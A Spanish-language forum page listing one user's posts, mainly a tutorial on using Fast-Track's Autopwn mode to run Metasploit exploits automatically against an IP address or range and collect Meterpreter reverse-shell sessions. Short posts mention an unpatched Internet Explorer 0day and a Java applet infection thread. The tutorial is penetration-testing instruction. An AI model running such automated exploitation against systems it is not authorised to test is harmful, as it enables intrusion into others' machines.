Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3531
[Fast-Track + Metasploit] Autopwn Automation
[Metasploit] By: Shell Root


Fast-Track es un proyecto basado en Python de código abierto destinado a ayudar a los Pent-Test en un esfuerzo por identificar, explotar y además penetrar en una red.

Fast-Track utiliza una gran parte de la Metasploit Framework para terminar los ataques con éxito. Fast Track tiene una amplia variedad de ataques únicos que le permiten utilizar el marco de Metasploit a su máximo potencial.

Como alguna vez miramos en estos 2 Articulos.

Al momento de escanear y obtener resultados contundentes con el Scanner Nessus And/Or Nmap, podremos hacer uso del Comando Autopwn, ahora que es lo que hace Autopwn Automation? Esto lo que hace es automatizar todos los pasos anteriores con tan solo poner la IP. Parece un poco Lammer, pero es una gran opción, al momento de realizar varios Test de Penetración en diferentes sistemas computacionales. Miremos.

Ejecutamos el Script Fast-Track.py y damos como parametros el modo para interactuar. Recordad:

  • -c (Command Line Mode)
  • -g (Web GUI Mode)
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py
[sudo] password for shellroot:
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>

shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
Psyco not detected....Recommend installing it for increased speeds.

----------------------------------------------------------------

Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...

Automated Penetration Testing

Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com

Wiki and Bug Track: http://www.thepentest.com

Please read the README and LICENSE before using
this tool for acceptable use and modifications.

----------------------------------------------------------------
Modes:

Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g

Examples: ./fast-track.py -i
          ./fast-track.py -c
          ./fast-track.py -g
          ./fast-track.py -g <portnum>

Usage: ./fast-track.py <mode>


************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************

**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST  (setup.py) ****

Visit http://trac.thepentest.com for tutorials or to file a bug.

1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About

Usage: fast-track.py -c <tool#>

shellroot@shellroot-desktop:~/fasttrack$


Seleccionamos el item Autopwn Automation
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2

Metasploit Autopwn Automated

Metasploit's Autopwn Function can require some knowledge in order
to set it up. Fast-Track tries to simplify that.

Simply type ./fast-track -c 2 <ipaddr or range> <-r or -b> (reverse or bind) to launch the exploits.

Usage: ./fast-track.py -c 2 <iprange> <-r or -b> <--reverse or bind

Examples: ./fast-track.py -c 2 192.168.1.1-254 -b
          ./fast-track.py -c 2 "-PN 192.168.1.1-254" -r
          ./fast-track.py -c 2 "-T 1 192.168.1.1/24" -r


shellroot@shellroot-desktop:~/fasttrack$


Miramos y Asignamos parametros son necesarios para correr el Exploit Automatizado.
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2 192.168.0.2 -r

Se creará una "Base de Datos", de nombre Pentest, y se ejecutará el Nmap con el Parametro IP o Rango Asignado. Ahora hará uso del comando Autopwn y esperametros a que termine de verificar los Exploit que pueden ser ejecutados por las vulnerabilidades encontradas en el sistema. Por ultimo esperaremos que nos entregue las sessiones el Meterpreter.

By: Shell Root
#3532
Cita de: ..::| D3Bć1 |::. en 21 Enero 2010, 18:06 PMSeñores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro...
jejeje

Joder, esto me tomo más de 1 Semana en ponerlo en practica!

Proximamente: Fast-Track And SET (Social Engineering Toolkit)
#3533
Image Comparison in C#
Joder, Justo lo que necesitaba. Gracias seba123neo ;·)
#3534
Linux: ./msfconsole
Windows: msfconsole.bat
#3535
Ajam, Ademas el 0Day solo sacaran parche hasta Feb (Eso lei por ahi). Así que venga tio, a darle duro!
#3536
Que tal, ando con una duda al crear una aplicacion, que lo unico que hace es comparar imagenes. Basicamente hace lo siguiente:

En 2 PictureBox tener la posibilidad de poner 2 Imagenes, al darle click en un Button, diga, Si son Iguales o no, y si se puede que diga por cuanto % es igual a la otra imagen.

Alguna pista de como crealo?
#3537
Cita de: ikary en 20 Enero 2010, 20:44 PM
Para este ataque es necesario que la victima se conecte mediante IE?
Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?
#3538
PHP / Re: Como verificó esto en php?
20 Enero 2010, 17:21 PM
Cita de: el-pollo en 20 Enero 2010, 16:59 PM... sí una variable es "algo.otracosa.otramas"...
Ok. ¬¬

Código (php) [Seleccionar]
if ($strVariable == "algo.otracosa.otramas")

¬¬
#3539
PHP / Re: Como verificó esto en php?
20 Enero 2010, 17:04 PM
WTF!
#3540
PHP / Re: Crear Carpetas en php
19 Enero 2010, 23:27 PM
Dije que perdon por el POST anterior ¬¬

Hablando de Applet, mirad si te sirve, http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection-t281594.0.html